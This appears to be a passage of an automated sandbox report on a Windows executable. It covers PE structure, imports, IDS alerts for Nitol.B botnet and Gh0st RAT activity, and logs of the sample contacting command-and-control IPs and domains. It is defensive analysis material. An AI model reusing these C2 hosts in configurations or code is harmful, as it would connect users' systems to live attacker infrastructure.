                                                                                            .data0x90000x1af780x400e59cdcb732e4bfbc84cc61dd68354f78False0.55078125data4.617802320695973IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .ndata0x240000x80000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                            .rsrc0x2c0000x571800x57200f51866e7e004246d34522d99909dd728False0.28211587607604016data3.929478885850329IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                            RT_ICON0x2c2b00x42028Device independent bitmap graphic, 256 x 512 x 32, image size 0EnglishUnited States0.25987883539959167
                                                                                            RT_ICON0x6e2d80x10828Device independent bitmap graphic, 128 x 256 x 32, image size 0EnglishUnited States0.31632260735833434
                                                                                            RT_ICON0x7eb000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishUnited States0.4346473029045643
                                                                                            RT_ICON0x810a80xca8Device independent bitmap graphic, 32 x 64 x 24, image size 3072EnglishUnited States0.5481481481481482
                                                                                            RT_ICON0x81d500x988Device independent bitmap graphic, 24 x 48 x 32, image size 0EnglishUnited States0.5434426229508197
                                                                                            RT_ICON0x826d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishUnited States0.6453900709219859
                                                                                            RT_DIALOG0x82b400x144dataEnglishUnited States0.5216049382716049
                                                                                            RT_DIALOG0x82c880x100dataEnglishUnited States0.5234375
                                                                                            RT_DIALOG0x82d880x11cdataEnglishUnited States0.6056338028169014
                                                                                            RT_DIALOG0x82ea80x60dataEnglishUnited States0.7291666666666666
                                                                                            RT_GROUP_ICON0x82f080x5adataEnglishUnited States0.8111111111111111
                                                                                            RT_MANIFEST0x82f680x215XML 1.0 document, ASCII text, with very long lines (533), with no line terminatorsEnglishUnited States0.575984990619137
                                                                                            DLLImport
                                                                                            KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA
                                                                                            USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                                                                            GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                                                                            SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                                                                            ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                                                                            COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                                                            ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                                                            VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
                                                                                            Language of compilation systemCountry where language is spokenMap
                                                                                            EnglishUnited States
                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                            2024-12-23T09:01:20.628261+01002807550ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 31192.168.2.949767120.48.34.2338080TCP
                                                                                            2024-12-23T09:01:20.628261+01002807550ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 31192.168.2.949857120.48.34.2338080TCP
                                                                                            2024-12-23T09:01:20.628261+01002807550ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 31192.168.2.949901120.48.34.2338080TCP
                                                                                            2024-12-23T09:01:20.628261+01002807550ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 31192.168.2.94995646.82.174.698090TCP
                                                                                            2024-12-23T09:01:20.628261+01002807550ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 31192.168.2.94986546.82.174.698090TCP
                                                                                            2024-12-23T09:01:20.628261+01002807550ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 31192.168.2.949713120.48.34.2338080TCP
                                                                                            2024-12-23T09:01:20.628261+01002807550ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 31192.168.2.9498208.7.198.468090TCP
                                                                                            2024-12-23T09:01:20.628261+01002807550ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 31192.168.2.949989120.48.34.2338080TCP
                                                                                            2024-12-23T09:01:20.628261+01002807550ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 31192.168.2.94991246.82.174.698090TCP
                                                                                            2024-12-23T09:01:20.628261+01002807550ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 31192.168.2.9497208.7.198.468090TCP
                                                                                            2024-12-23T09:01:20.628261+01002807550ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 31192.168.2.9497748.7.198.468090TCP
                                                                                            2024-12-23T09:01:20.628261+01002807550ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 31192.168.2.949945120.48.34.2338080TCP
                                                                                            2024-12-23T09:01:20.628261+01002807550ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 31192.168.2.949814120.48.34.2338080TCP
                                                                                            2024-12-23T09:01:27.972349+01002013214ET MALWARE Gh0st Remote Access Trojan Encrypted Session To CnC Server1192.168.2.949707120.48.34.2338000TCP
                                                                                            2024-12-23T09:01:27.972349+01002016922ET MALWARE Backdoor family PCRat/Gh0st CnC traffic1192.168.2.949707120.48.34.2338000TCP
                                                                                            2024-12-23T09:01:28.392042+01002025135ET MALWARE [PTsecurity] Botnet Nitol.B Checkin1192.168.2.949713120.48.34.2338080TCP
                                                                                            2024-12-23T09:01:28.949435+01002048478ET MALWARE [ANY.RUN] Win32/Gh0stRat Keep-Alive1120.48.34.2338000192.168.2.949707TCP
                                                                                            2024-12-23T09:01:28.949435+01002808814ETPRO MALWARE Backdoor family PCRat/Gh0st CnC Response1120.48.34.2338000192.168.2.949707TCP
                                                                                            2024-12-23T09:01:30.624146+01002025135ET MALWARE [PTsecurity] Botnet Nitol.B Checkin1192.168.2.9497208.7.198.468090TCP
                                                                                            2024-12-23T09:01:50.831677+01002025135ET MALWARE [PTsecurity] Botnet Nitol.B Checkin1192.168.2.949767120.48.34.2338080TCP
                                                                                            2024-12-23T09:01:53.205437+01002025135ET MALWARE [PTsecurity] Botnet Nitol.B Checkin1192.168.2.9497748.7.198.468090TCP
                                                                                            2024-12-23T09:02:13.473112+01002025135ET MALWARE [PTsecurity] Botnet Nitol.B Checkin1192.168.2.949814120.48.34.2338080TCP
                                                                                            2024-12-23T09:02:15.979966+01002025135ET MALWARE [PTsecurity] Botnet Nitol.B Checkin1192.168.2.9498208.7.198.468090TCP
                                                                                            2024-12-23T09:02:35.999010+01002025135ET MALWARE [PTsecurity] Botnet Nitol.B Checkin1192.168.2.949857120.48.34.2338080TCP
                                                                                            2024-12-23T09:02:39.320654+01002025135ET MALWARE [PTsecurity] Botnet Nitol.B Checkin1192.168.2.94986546.82.174.698090TCP
                                                                                            2024-12-23T09:02:58.388861+01002025135ET MALWARE [PTsecurity] Botnet Nitol.B Checkin1192.168.2.949901120.48.34.2338080TCP
                                                                                            2024-12-23T09:03:01.971236+01002025135ET MALWARE [PTsecurity] Botnet Nitol.B Checkin1192.168.2.94991246.82.174.698090TCP
                                                                                            2024-12-23T09:03:21.114463+01002025135ET MALWARE [PTsecurity] Botnet Nitol.B Checkin1192.168.2.949945120.48.34.2338080TCP
                                                                                            2024-12-23T09:03:27.358663+01002025135ET MALWARE [PTsecurity] Botnet Nitol.B Checkin1192.168.2.94995646.82.174.698090TCP
                                                                                            2024-12-23T09:03:43.593518+01002025135ET MALWARE [PTsecurity] Botnet Nitol.B Checkin1192.168.2.949989120.48.34.2338080TCP
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Dec 23, 2024 09:01:27.309005976 CET497078000192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:01:27.428514004 CET800049707120.48.34.233192.168.2.9
                                                                                            Dec 23, 2024 09:01:27.429425955 CET497078000192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:01:27.972348928 CET497078000192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:01:28.092051029 CET800049707120.48.34.233192.168.2.9
                                                                                            Dec 23, 2024 09:01:28.261584044 CET497138080192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:01:28.381030083 CET808049713120.48.34.233192.168.2.9
                                                                                            Dec 23, 2024 09:01:28.382185936 CET497138080192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:01:28.392041922 CET497138080192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:01:28.473566055 CET4971480192.168.2.9192.168.2.1
                                                                                            Dec 23, 2024 09:01:28.511744976 CET808049713120.48.34.233192.168.2.9
                                                                                            Dec 23, 2024 09:01:28.949434996 CET800049707120.48.34.233192.168.2.9
                                                                                            Dec 23, 2024 09:01:28.991348028 CET497078000192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:01:29.478861094 CET4971480192.168.2.9192.168.2.1
                                                                                            Dec 23, 2024 09:01:30.499006987 CET497208090192.168.2.98.7.198.46
                                                                                            Dec 23, 2024 09:01:30.619762897 CET8090497208.7.198.46192.168.2.9
                                                                                            Dec 23, 2024 09:01:30.619873047 CET497208090192.168.2.98.7.198.46
                                                                                            Dec 23, 2024 09:01:30.624145985 CET497208090192.168.2.98.7.198.46
                                                                                            Dec 23, 2024 09:01:30.743621111 CET8090497208.7.198.46192.168.2.9
                                                                                            Dec 23, 2024 09:01:31.494481087 CET4971480192.168.2.9192.168.2.1
                                                                                            Dec 23, 2024 09:01:39.262633085 CET4974080192.168.2.9192.168.2.1
                                                                                            Dec 23, 2024 09:01:40.275746107 CET4974080192.168.2.9192.168.2.1
                                                                                            Dec 23, 2024 09:01:42.291440010 CET4974080192.168.2.9192.168.2.1
                                                                                            Dec 23, 2024 09:01:50.296468019 CET808049713120.48.34.233192.168.2.9
                                                                                            Dec 23, 2024 09:01:50.296577930 CET497138080192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:01:50.296652079 CET497138080192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:01:50.416238070 CET808049713120.48.34.233192.168.2.9
                                                                                            Dec 23, 2024 09:01:50.668209076 CET497678080192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:01:50.787794113 CET808049767120.48.34.233192.168.2.9
                                                                                            Dec 23, 2024 09:01:50.787890911 CET497678080192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:01:50.831676960 CET497678080192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:01:50.951185942 CET808049767120.48.34.233192.168.2.9
                                                                                            Dec 23, 2024 09:01:51.308129072 CET4976880192.168.2.9192.168.2.1
                                                                                            Dec 23, 2024 09:01:52.322657108 CET4976880192.168.2.9192.168.2.1
                                                                                            Dec 23, 2024 09:01:52.530970097 CET8090497208.7.198.46192.168.2.9
                                                                                            Dec 23, 2024 09:01:52.531028986 CET497208090192.168.2.98.7.198.46
                                                                                            Dec 23, 2024 09:01:52.531130075 CET497208090192.168.2.98.7.198.46
                                                                                            Dec 23, 2024 09:01:52.699199915 CET8090497208.7.198.46192.168.2.9
                                                                                            Dec 23, 2024 09:01:53.066256046 CET497748090192.168.2.98.7.198.46
                                                                                            Dec 23, 2024 09:01:53.185925007 CET8090497748.7.198.46192.168.2.9
                                                                                            Dec 23, 2024 09:01:53.186050892 CET497748090192.168.2.98.7.198.46
                                                                                            Dec 23, 2024 09:01:53.205436945 CET497748090192.168.2.98.7.198.46
                                                                                            Dec 23, 2024 09:01:53.325129032 CET8090497748.7.198.46192.168.2.9
                                                                                            Dec 23, 2024 09:01:54.322629929 CET4976880192.168.2.9192.168.2.1
                                                                                            Dec 23, 2024 09:02:05.458664894 CET4979880192.168.2.9192.168.2.1
                                                                                            Dec 23, 2024 09:02:06.635112047 CET4979880192.168.2.9192.168.2.1
                                                                                            Dec 23, 2024 09:02:12.687206984 CET808049767120.48.34.233192.168.2.9
                                                                                            Dec 23, 2024 09:02:12.691040993 CET497678080192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:02:12.691040993 CET497678080192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:02:12.810627937 CET808049767120.48.34.233192.168.2.9
                                                                                            Dec 23, 2024 09:02:13.206607103 CET498148080192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:02:13.326400995 CET808049814120.48.34.233192.168.2.9
                                                                                            Dec 23, 2024 09:02:13.327873945 CET498148080192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:02:13.473112106 CET498148080192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:02:13.592803001 CET808049814120.48.34.233192.168.2.9
                                                                                            Dec 23, 2024 09:02:15.078399897 CET8090497748.7.198.46192.168.2.9
                                                                                            Dec 23, 2024 09:02:15.078636885 CET497748090192.168.2.98.7.198.46
                                                                                            Dec 23, 2024 09:02:15.078686953 CET497748090192.168.2.98.7.198.46
                                                                                            Dec 23, 2024 09:02:15.198329926 CET8090497748.7.198.46192.168.2.9
                                                                                            Dec 23, 2024 09:02:15.801204920 CET498208090192.168.2.98.7.198.46
                                                                                            Dec 23, 2024 09:02:15.920835972 CET8090498208.7.198.46192.168.2.9
                                                                                            Dec 23, 2024 09:02:15.920917988 CET498208090192.168.2.98.7.198.46
                                                                                            Dec 23, 2024 09:02:15.979965925 CET498208090192.168.2.98.7.198.46
                                                                                            Dec 23, 2024 09:02:16.099468946 CET8090498208.7.198.46192.168.2.9
                                                                                            Dec 23, 2024 09:02:21.323402882 CET4983180192.168.2.9192.168.2.1
                                                                                            Dec 23, 2024 09:02:22.432017088 CET4983180192.168.2.9192.168.2.1
                                                                                            Dec 23, 2024 09:02:35.219206095 CET808049814120.48.34.233192.168.2.9
                                                                                            Dec 23, 2024 09:02:35.219320059 CET498148080192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:02:35.219425917 CET498148080192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:02:35.338879108 CET808049814120.48.34.233192.168.2.9
                                                                                            Dec 23, 2024 09:02:35.855015993 CET498578080192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:02:35.974698067 CET808049857120.48.34.233192.168.2.9
                                                                                            Dec 23, 2024 09:02:35.974812031 CET498578080192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:02:35.999010086 CET498578080192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:02:36.118805885 CET808049857120.48.34.233192.168.2.9
                                                                                            Dec 23, 2024 09:02:37.828370094 CET8090498208.7.198.46192.168.2.9
                                                                                            Dec 23, 2024 09:02:37.828466892 CET498208090192.168.2.98.7.198.46
                                                                                            Dec 23, 2024 09:02:37.833422899 CET498208090192.168.2.98.7.198.46
                                                                                            Dec 23, 2024 09:02:37.953042984 CET8090498208.7.198.46192.168.2.9
                                                                                            Dec 23, 2024 09:02:38.244786024 CET4985980192.168.2.9192.168.2.1
                                                                                            Dec 23, 2024 09:02:39.180397034 CET498658090192.168.2.946.82.174.69
                                                                                            Dec 23, 2024 09:02:39.300158978 CET80904986546.82.174.69192.168.2.9
                                                                                            Dec 23, 2024 09:02:39.300235987 CET498658090192.168.2.946.82.174.69
                                                                                            Dec 23, 2024 09:02:39.320653915 CET498658090192.168.2.946.82.174.69
                                                                                            Dec 23, 2024 09:02:39.322612047 CET4985980192.168.2.9192.168.2.1
                                                                                            Dec 23, 2024 09:02:39.440367937 CET80904986546.82.174.69192.168.2.9
                                                                                            Dec 23, 2024 09:02:51.651910067 CET4988680192.168.2.9192.168.2.1
                                                                                            Dec 23, 2024 09:02:52.744492054 CET4988680192.168.2.9192.168.2.1
                                                                                            Dec 23, 2024 09:02:54.748334885 CET4988680192.168.2.9192.168.2.1
                                                                                            Dec 23, 2024 09:02:57.891376019 CET808049857120.48.34.233192.168.2.9
                                                                                            Dec 23, 2024 09:02:57.891484976 CET498578080192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:02:57.891562939 CET498578080192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:02:58.011149883 CET808049857120.48.34.233192.168.2.9
                                                                                            Dec 23, 2024 09:02:58.236731052 CET499018080192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:02:58.356364012 CET808049901120.48.34.233192.168.2.9
                                                                                            Dec 23, 2024 09:02:58.356431961 CET499018080192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:02:58.388860941 CET499018080192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:02:58.508311987 CET808049901120.48.34.233192.168.2.9
                                                                                            Dec 23, 2024 09:03:01.188460112 CET80904986546.82.174.69192.168.2.9
                                                                                            Dec 23, 2024 09:03:01.188584089 CET498658090192.168.2.946.82.174.69
                                                                                            Dec 23, 2024 09:03:01.203162909 CET498658090192.168.2.946.82.174.69
                                                                                            Dec 23, 2024 09:03:01.322906971 CET80904986546.82.174.69192.168.2.9
                                                                                            Dec 23, 2024 09:03:01.837568998 CET499128090192.168.2.946.82.174.69
                                                                                            Dec 23, 2024 09:03:01.957370996 CET80904991246.82.174.69192.168.2.9
                                                                                            Dec 23, 2024 09:03:01.957520008 CET499128090192.168.2.946.82.174.69
                                                                                            Dec 23, 2024 09:03:01.971235991 CET499128090192.168.2.946.82.174.69
                                                                                            Dec 23, 2024 09:03:02.091120958 CET80904991246.82.174.69192.168.2.9
                                                                                            Dec 23, 2024 09:03:03.487463951 CET4991380192.168.2.9192.168.2.1
                                                                                            Dec 23, 2024 09:03:04.635126114 CET4991380192.168.2.9192.168.2.1
                                                                                            Dec 23, 2024 09:03:06.650738001 CET4991380192.168.2.9192.168.2.1
                                                                                            Dec 23, 2024 09:03:18.761652946 CET4994480192.168.2.9192.168.2.1
                                                                                            Dec 23, 2024 09:03:19.822778940 CET4994480192.168.2.9192.168.2.1
                                                                                            Dec 23, 2024 09:03:20.266613007 CET808049901120.48.34.233192.168.2.9
                                                                                            Dec 23, 2024 09:03:20.266696930 CET499018080192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:03:20.278000116 CET499018080192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:03:20.397490025 CET808049901120.48.34.233192.168.2.9
                                                                                            Dec 23, 2024 09:03:20.947494984 CET499458080192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:03:21.067136049 CET808049945120.48.34.233192.168.2.9
                                                                                            Dec 23, 2024 09:03:21.067209959 CET499458080192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:03:21.114463091 CET499458080192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:03:21.234143972 CET808049945120.48.34.233192.168.2.9
                                                                                            Dec 23, 2024 09:03:23.860250950 CET80904991246.82.174.69192.168.2.9
                                                                                            Dec 23, 2024 09:03:23.860315084 CET499128090192.168.2.946.82.174.69
                                                                                            Dec 23, 2024 09:03:23.925561905 CET499128090192.168.2.946.82.174.69
                                                                                            Dec 23, 2024 09:03:24.045438051 CET80904991246.82.174.69192.168.2.9
                                                                                            Dec 23, 2024 09:03:24.808881044 CET499568090192.168.2.946.82.174.69
                                                                                            Dec 23, 2024 09:03:24.928639889 CET80904995646.82.174.69192.168.2.9
                                                                                            Dec 23, 2024 09:03:24.928721905 CET499568090192.168.2.946.82.174.69
                                                                                            Dec 23, 2024 09:03:27.358663082 CET499568090192.168.2.946.82.174.69
                                                                                            Dec 23, 2024 09:03:27.478358984 CET80904995646.82.174.69192.168.2.9
                                                                                            Dec 23, 2024 09:03:32.248712063 CET4996880192.168.2.9192.168.2.1
                                                                                            Dec 23, 2024 09:03:33.338233948 CET4996880192.168.2.9192.168.2.1
                                                                                            Dec 23, 2024 09:03:35.432018995 CET4996880192.168.2.9192.168.2.1
                                                                                            Dec 23, 2024 09:03:39.431999922 CET4996880192.168.2.9192.168.2.1
                                                                                            Dec 23, 2024 09:03:42.970238924 CET808049945120.48.34.233192.168.2.9
                                                                                            Dec 23, 2024 09:03:42.970336914 CET499458080192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:03:42.970494032 CET499458080192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:03:43.089947939 CET808049945120.48.34.233192.168.2.9
                                                                                            Dec 23, 2024 09:03:43.466651917 CET499898080192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:03:43.589922905 CET808049989120.48.34.233192.168.2.9
                                                                                            Dec 23, 2024 09:03:43.590049982 CET499898080192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:03:43.593518019 CET499898080192.168.2.9120.48.34.233
                                                                                            Dec 23, 2024 09:03:43.713032007 CET808049989120.48.34.233192.168.2.9
                                                                                            Dec 23, 2024 09:03:46.845423937 CET80904995646.82.174.69192.168.2.9
                                                                                            Dec 23, 2024 09:03:46.845567942 CET499568090192.168.2.946.82.174.69
                                                                                            Dec 23, 2024 09:03:46.845746994 CET499568090192.168.2.946.82.174.69
                                                                                            Dec 23, 2024 09:03:46.965298891 CET80904995646.82.174.69192.168.2.9
                                                                                            Dec 23, 2024 09:03:47.431973934 CET4996880192.168.2.9192.168.2.1
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Dec 23, 2024 09:01:28.665868998 CET5412553192.168.2.91.1.1.1
                                                                                            Dec 23, 2024 09:01:29.670260906 CET5412553192.168.2.91.1.1.1
                                                                                            Dec 23, 2024 09:01:30.498198986 CET53541251.1.1.1192.168.2.9
                                                                                            Dec 23, 2024 09:01:30.498219967 CET53541251.1.1.1192.168.2.9
                                                                                            Dec 23, 2024 09:01:32.565638065 CET6451653192.168.2.91.1.1.1
                                                                                            Dec 23, 2024 09:01:32.799855947 CET53645161.1.1.1192.168.2.9
                                                                                            Dec 23, 2024 09:01:32.801898956 CET5649253192.168.2.91.1.1.1
                                                                                            Dec 23, 2024 09:01:33.028306007 CET53564921.1.1.1192.168.2.9
                                                                                            Dec 23, 2024 09:01:33.031330109 CET6433153192.168.2.91.1.1.1
                                                                                            Dec 23, 2024 09:01:33.075165033 CET6220553192.168.2.91.1.1.1
                                                                                            Dec 23, 2024 09:01:33.212970972 CET53622051.1.1.1192.168.2.9
                                                                                            Dec 23, 2024 09:01:33.213119030 CET53643311.1.1.1192.168.2.9
                                                                                            Dec 23, 2024 09:01:43.420120001 CET5050853192.168.2.91.1.1.1
                                                                                            Dec 23, 2024 09:01:43.557501078 CET53505081.1.1.1192.168.2.9
                                                                                            Dec 23, 2024 09:01:47.859332085 CET5112253192.168.2.91.1.1.1
                                                                                            Dec 23, 2024 09:01:47.996969938 CET53511221.1.1.1192.168.2.9
                                                                                            Dec 23, 2024 09:01:53.763612032 CET6347653192.168.2.91.1.1.1
                                                                                            Dec 23, 2024 09:01:53.901804924 CET53634761.1.1.1192.168.2.9
                                                                                            Dec 23, 2024 09:01:58.220653057 CET5911753192.168.2.91.1.1.1
                                                                                            Dec 23, 2024 09:01:58.358697891 CET53591171.1.1.1192.168.2.9
                                                                                            Dec 23, 2024 09:02:38.731265068 CET5775153192.168.2.91.1.1.1
                                                                                            Dec 23, 2024 09:02:39.132702112 CET53577511.1.1.1192.168.2.9
                                                                                            Dec 23, 2024 09:03:15.948908091 CET5762953192.168.2.91.1.1.1
                                                                                            Dec 23, 2024 09:03:16.086868048 CET53576291.1.1.1192.168.2.9
                                                                                            TimestampSource IPDest IPChecksumCodeType
                                                                                            Dec 23, 2024 09:01:28.473617077 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                                                                                            Dec 23, 2024 09:01:29.478907108 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                                                                                            Dec 23, 2024 09:01:31.494524956 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                                                                                            Dec 23, 2024 09:01:39.262734890 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                                                                                            Dec 23, 2024 09:01:40.275851965 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                                                                                            Dec 23, 2024 09:01:42.291501999 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                                                                                            Dec 23, 2024 09:01:51.308175087 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                                                                                            Dec 23, 2024 09:01:52.322698116 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                                                                                            Dec 23, 2024 09:01:54.322693110 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                                                                                            Dec 23, 2024 09:02:05.458766937 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                                                                                            Dec 23, 2024 09:02:06.635174990 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                                                                                            Dec 23, 2024 09:02:21.323445082 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                                                                                            Dec 23, 2024 09:02:22.432065010 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                                                                                            Dec 23, 2024 09:02:38.244836092 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                                                                                            Dec 23, 2024 09:02:39.322666883 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                                                                                            Dec 23, 2024 09:02:51.651959896 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                                                                                            Dec 23, 2024 09:02:52.744534016 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                                                                                            Dec 23, 2024 09:02:54.748383045 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                                                                                            Dec 23, 2024 09:03:03.487519026 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                                                                                            Dec 23, 2024 09:03:04.635226965 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                                                                                            Dec 23, 2024 09:03:06.650788069 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                                                                                            Dec 23, 2024 09:03:18.761710882 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                                                                                            Dec 23, 2024 09:03:19.822830915 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                                                                                            Dec 23, 2024 09:03:32.248764038 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                                                                                            Dec 23, 2024 09:03:33.338289022 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                                                                                            Dec 23, 2024 09:03:35.432100058 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                                                                                            Dec 23, 2024 09:03:39.432068110 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                                                                                            Dec 23, 2024 09:03:47.432035923 CET192.168.2.1192.168.2.9827e(Port unreachable)Destination Unreachable
                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Dec 23, 2024 09:01:28.665868998 CET192.168.2.91.1.1.10x90b7Standard query (0)chinagov.8800.orgA (IP address)IN (0x0001)false
                                                                                            Dec 23, 2024 09:01:29.670260906 CET192.168.2.91.1.1.10x90b7Standard query (0)chinagov.8800.orgA (IP address)IN (0x0001)false
                                                                                            Dec 23, 2024 09:01:32.565638065 CET192.168.2.91.1.1.10x61f8Standard query (0)www.wk1888.comA (IP address)IN (0x0001)false
                                                                                            Dec 23, 2024 09:01:32.801898956 CET192.168.2.91.1.1.10x1ee1Standard query (0)www.af0575.comA (IP address)IN (0x0001)false
                                                                                            Dec 23, 2024 09:01:33.031330109 CET192.168.2.91.1.1.10x2dc8Standard query (0)www.fz0575.comA (IP address)IN (0x0001)false
